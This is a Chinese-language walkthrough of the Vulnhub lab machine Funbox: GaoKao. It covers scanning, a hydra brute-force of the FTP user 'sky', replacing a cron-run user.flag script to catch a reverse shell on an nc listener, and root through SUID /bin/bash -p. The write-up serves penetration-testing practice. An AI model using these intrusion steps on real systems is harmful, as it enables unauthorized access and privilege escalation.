Vulnhub之Funbox Gaokao靶机解题过程
Funbox Gaokao
靶机基本信息
名称:Funbox: GaoKao
地址:https://www.vulnhub.com/entry/funbox-gaokao,707/
提示:Don't waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per account.
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Funbox_GaoKao]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.218.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:3a:6b:ac 1 60 PCS Systemtechnik GmbH
192.168.56.204 08:00:27:37:ea:cf 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.204
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Funbox_GaoKao]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.204 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-21 08:52 EST
Nmap scan report for bogon (192.168.56.204)
Host is up (0.000059s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 169 Jun 5 2021 welcome.msg
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 48:39:31:22:fb:c2:03:44:a7:4e:c0:fa:b8:ad:2f:96 (RSA)
| 256 70:a7:74:5e:a3:79:60:28:1a:45:4c:ab:5c:e7:87:ad (ECDSA)
|_ 256 9c:35:ce:f6:59:66:7f:ae:c4:d1:21:16:d5:aa:56:71 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Wellcome to Funbox: Gaokao !
|_http-server-header: Apache/2.4.29 (Ubuntu)
3306/tcp open mysql MySQL 5.7.34-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.7.34-0ubuntu0.18.04.1
| Thread ID: 3
| Capabilities flags: 65535
| Some Capabilities: ODBCClient, Support41Auth, LongPassword, SupportsLoadDataLocal, IgnoreSigpipes, Speaks41ProtocolOld, SupportsTransactions, LongColumnFlag, SwitchToSSLAfterHandshake, InteractiveClient, ConnectWithDatabase, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, FoundRows, SupportsCompression, Speaks41ProtocolNew, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: N08\x11t\x18E/\x05n|\x7F?\x0B\x18)"IqI
|_ Auth Plugin Name: mysql_native_password
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_5.7.34_Auto_Generated_Server_Certificate
| Not valid before: 2021-06-05T15:15:30
|_Not valid after: 2031-06-03T15:15:30
MAC Address: 08:00:27:37:EA:CF (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds
NMAP扫描结果表明目标主机有4个开放端口:21(FTP)、22(SSH)、80(HTTP)、3306(MySQL)。
Get Access
──(kali㉿kali)-[~/Vulnhub/Funbox_GaoKao]
└─$ ftp 192.168.56.204
Connected to 192.168.56.204.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.204]
Name (192.168.56.204:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.56.137 !
230-
230-The local time is: Mon Nov 21 14:08:05 2022
230-
230-This is an experimental FTP server. If you have any unusual problems,
230-please report them via e-mail to <sky@funbox9>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||11829|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 ftp ftp 169 Jun 5 2021 welcome.msg
226 Transfer complete
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||47876|)
150 Opening BINARY mode data connection for welcome.msg (169 bytes)
100% |*************************************************************************************************************************************************************************************| 169 4.74 MiB/s 00:00 ETA
226 Transfer complete
169 bytes received in 00:00 (176.70 KiB/s)
ftp> ls -alh
229 Entering Extended Passive Mode (|||37903|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 ftp ftp 4.0k Jun 5 2021 .
drwxr-xr-x 2 ftp ftp 4.0k Jun 5 2021 ..
-rw-r--r-- 1 ftp ftp 169 Jun 5 2021 welcome.msg
226 Transfer complete
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Funbox_GaoKao]
└─$ cat welcome.msg
Welcome, archive user %U@%R !
The local time is: %T
This is an experimental FTP server. If you have any unusual problems,
please report them via e-mail to <sky@%L>.
FTP服务器有个文件,将其下载到Kali 本地,但目前看没啥用。
┌──(kali㉿kali)-[~/Vulnhub/Funbox_GaoKao]
└─$ searchsploit proftpd
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
FreeBSD - 'ftpd / ProFTPd' Remote Command Execution | freebsd/remote/18181.txt
ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow | linux/local/394.c
ProFTPd - 'mod_mysql' Authentication Bypass | multiple/remote/8037.txt
ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC) | linux/dos/16129.txt
ProFTPd 1.2 - 'SIZE' Remote Denial of Service | linux/dos/20536.java
ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Remote Buffer Overflow (Metasploit) | linux/remote/16852.rb
ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1) | linux/remote/19475.c
ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2) | linux/remote/19476.c
ProFTPd 1.2 pre6 - 'snprintf' Remote Root | linux/remote/19503.txt
ProFTPd 1.2.0 pre10 - Remote Denial of Service | linux/dos/244.java
ProFTPd 1.2.0 rc2 - Memory Leakage | linux/dos/241.c
ProFTPd 1.2.10 - Remote Users Enumeration | linux/remote/581.c
ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force | linux/remote/110.c
ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun | linux/dos/23170.c
ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection | linux/remote/43.pl
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1) | linux/remote/107.c
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (2) | linux/remote/3021.txt
ProFTPd 1.2.x - 'STAT' Denial of Service | linux/dos/22079.sh
ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection | multiple/remote/32798.pl
ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow | unix/local/10044.pl
ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit) | linux/remote/2856.pm
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1) | linux/local/3330.pl
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2) | linux/local/3333.pl
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' exec-shield Local Overflow | linux/local/3730.txt
ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC) | linux/dos/2928.py
ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit) | linux/remote/16878.rb
ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit) | linux/remote/16851.rb
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution | linux/remote/15662.txt
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
ProFTPD 1.3.7a - Remote Denial of Service | multiple/dos/49697.py
ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow | linux/remote/4312.c
ProFTPd IAC 1.3.x - Remote Command Execution | linux/remote/15449.pl
ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit) | linux/remote/16921.rb
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (1) | linux/remote/19086.c
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (2) | linux/remote/19087.c
WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion | linux/remote/20690.sh
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
目标主机的FTP版本:ProFTPd的版本为1.3.5e,似乎有漏洞可利用,先用msfconsole尝试,不过执行失败,看一下其他的利用代码,看来这些漏洞利用代码都不适合1.3.5e的版本:
浏览器访问80端口,返回apche默认页面。
┌──(kali㉿kali)-[~/Vulnhub/Funbox_GaoKao]
└─$ gobuster dir --url http://192.168.56.204 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.204
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/21 09:10:16 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
Progress: 218044 / 220561 (98.86%)===============================================================
2022/11/21 09:10:38 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Funbox_GaoKao]
└─$ gobuster dir --url http://192.168.56.204 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.204
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: txt,sh,html,php
[+] Timeout: 10s
===============================================================
2022/11/21 09:10:52 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10310]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1100967 / 1102805 (99.83%)===============================================================
2022/11/21 09:12:51 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Funbox_GaoKao]
└─$ dirb http://192.168.56.204
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Nov 21 09:13:12 2022
URL_BASE: http://192.168.56.204/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.204/ ----
+ http://192.168.56.204/index.html (CODE:200|SIZE:10310)
+ http://192.168.56.204/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Mon Nov 21 09:13:13 2022
DOWNLOADED: 4612 - FOUND: 2
┌──(kali㉿kali)-[~/Vulnhub/Funbox_GaoKao]
└─$ nikto -h http://192.168.56.204
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.204
+ Target Hostname: 192.168.56.204
+ Target Port: 80
+ Start Time: 2022-11-21 09:13:26 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2846, size: 5c409ca1d2835, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2022-11-21 09:14:15 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
目录扫描没有啥收获。
回过头看ftp,在banner里看到了一个邮箱地址sky@ ,因此sky应该是用户名
┌──(kali㉿kali)-[~/Vulnhub/Funbox_GaoKao]
└─$ hydra -l sky -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.204
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-21 09:50:16
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.204:21/
[STATUS] 352.00 tries/min, 352 tries in 00:01h, 14344047 to do in 679:11h, 16 active
[21][ftp] host: 192.168.56.204 login: sky password: thebest
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-21 09:52:41
┌──(kali㉿kali)-[~/Vulnhub/Funbox_GaoKao]
└─$ ftp 192.168.56.204
Connected to 192.168.56.204.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.204]
Name (192.168.56.204:kali): sky
331 Password required for sky
Password:
230 User sky logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||12314|)
150 Opening ASCII mode data connection for file list
-rwxr-x--- 1 sky sarah 66 Jun 6 2021 user.flag
226 Transfer complete
ftp> ls -a;lh
229 Entering Extended Passive Mode (|||19123|)
150 Opening ASCII mode data connection for file list
450 ;lh: No such file or directory
ftp> ls -alh
229 Entering Extended Passive Mode (|||13882|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 3 sky sky 4.0k Jun 6 2021 .
drwxr-xr-x 5 root root 4.0k Jun 5 2021 ..
-rw------- 1 sky sky 56 Jun 5 2021 .bash_history
-r--r--r-- 1 sky sky 220 Jun 5 2021 .bash_logout
-r--r--r-- 1 sky sky 3.7k Jun 5 2021 .bashrc
-r--r--r-- 1 sky sky 807 Jun 5 2021 .profile
drwxr----- 2 root root 4.0k Jun 5 2021 .ssh
-rwxr-x--- 1 sky sarah 66 Jun 6 2021 user.flag
-rw------- 1 sky sky 1.5k Jun 5 2021 .viminfo
226 Transfer complete
ftp> put user.flag
local: user.flag remote: user.flag
229 Entering Extended Passive Mode (|||3022|)
150 Opening BINARY mode data connection for user.flag
100% |*************************************************************************************************************************************************************************************| 111 6.22 MiB/s 00:00 ETA
226 Transfer complete
111 bytes sent in 00:00 (139.32 KiB/s)
ftp>
修改user.flag,
这个User flag 跟一般的flag 不一样,发现它是一个shell脚本,因为它本身是一个shell脚本,猜测有个cron任务在执行它,从而得到shell:(修改user flag,然后将put到目标主机)
┌──(kali㉿kali)-[~/Vulnhub/Funbox_GaoKao]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.204] 40810
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$ id
id
uid=1002(sarah) gid=1002(sarah) groups=1002(sarah)
bash-4.4$ id
id
uid=1002(sarah) gid=1002(sarah) groups=1002(sarah)
bash-4.4$
提权
bash-4.4$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/bin/bash
/bin/su
/bin/fusermount
/bin/ping
/bin/mount
/bin/umount
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/procmail
/usr/bin/newgidmap
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/at
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
bash-4.4$ /bin/bash -p
/bin/bash -p
id
uid=1002(sarah) gid=1002(sarah) euid=0(root) egid=0(root) groups=0(root),1002(sarah)
cd /root
ls -alh
total 28K
drwx------ 4 root root 4.0K Jun 6 2021 .
drwxr-xr-x 24 root root 4.0K Jun 5 2021 ..
-rw------- 1 root root 0 Jun 6 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 2.3K Jun 5 2021 root.flag
drwx------ 2 root root 4.0K Jun 5 2021 .ssh
drwxr-xr-x 2 root root 4.0K Jun 5 2021 .vim
-rw------- 1 root root 0 Jun 6 2021 .viminfo
cat root.flag
█████▒█ ██ ███▄ █ ▄▄▄▄ ▒█████ ▒██ ██▒ ▄████ ▄▄▄ ▒█████ ██ ▄█▀▄▄▄ ▒█████
▓██ ▒ ██ ▓██▒ ██ ▀█ █ ▓█████▄ ▒██▒ ██▒▒▒ █ █ ▒░ ██▒ ▀█▒▒████▄ ▒██▒ ██▒ ██▄█▒▒████▄ ▒██▒ ██▒
▒████ ░▓██ ▒██░▓██ ▀█ ██▒▒██▒ ▄██▒██░ ██▒░░ █ ░ ▒██░▄▄▄░▒██ ▀█▄ ▒██░ ██▒▓███▄░▒██ ▀█▄ ▒██░ ██▒
░▓█▒ ░▓▓█ ░██░▓██▒ ▐▌██▒▒██░█▀ ▒██ ██░ ░ █ █ ▒ ░▓█ ██▓░██▄▄▄▄██ ▒██ ██░▓██ █▄░██▄▄▄▄██ ▒██ ██░
░▒█░ ▒▒█████▓ ▒██░ ▓██░░▓█ ▀█▓░ ████▓▒░▒██▒ ▒██▒ ░▒▓███▀▒ ▓█ ▓██▒░ ████▓▒░▒██▒ █▄▓█ ▓██▒░ ████▓▒░
▒ ░ ░▒▓▒ ▒ ▒ ░ ▒░ ▒ ▒ ░▒▓███▀▒░ ▒░▒░▒░ ▒▒ ░ ░▓ ░ ░▒ ▒ ▒▒ ▓▒█░░ ▒░▒░▒░ ▒ ▒▒ ▓▒▒▒ ▓▒█░░ ▒░▒░▒░
░ ░░▒░ ░ ░ ░ ░░ ░ ▒░▒░▒ ░ ░ ▒ ▒░ ░░ ░▒ ░ ░ ░ ▒ ▒▒ ░ ░ ▒ ▒░ ░ ░▒ ▒░ ▒ ▒▒ ░ ░ ▒ ▒░
░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░░ ░ ░ ▒ ░ ░ ░ ▒
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░
You did it !
THX for playing Funbox: GAOKAO !
I look forward to see this screenshot on twitter: @0815R2d2
STRIVE FOR PROGRESS,NOT FOR PERFECTION
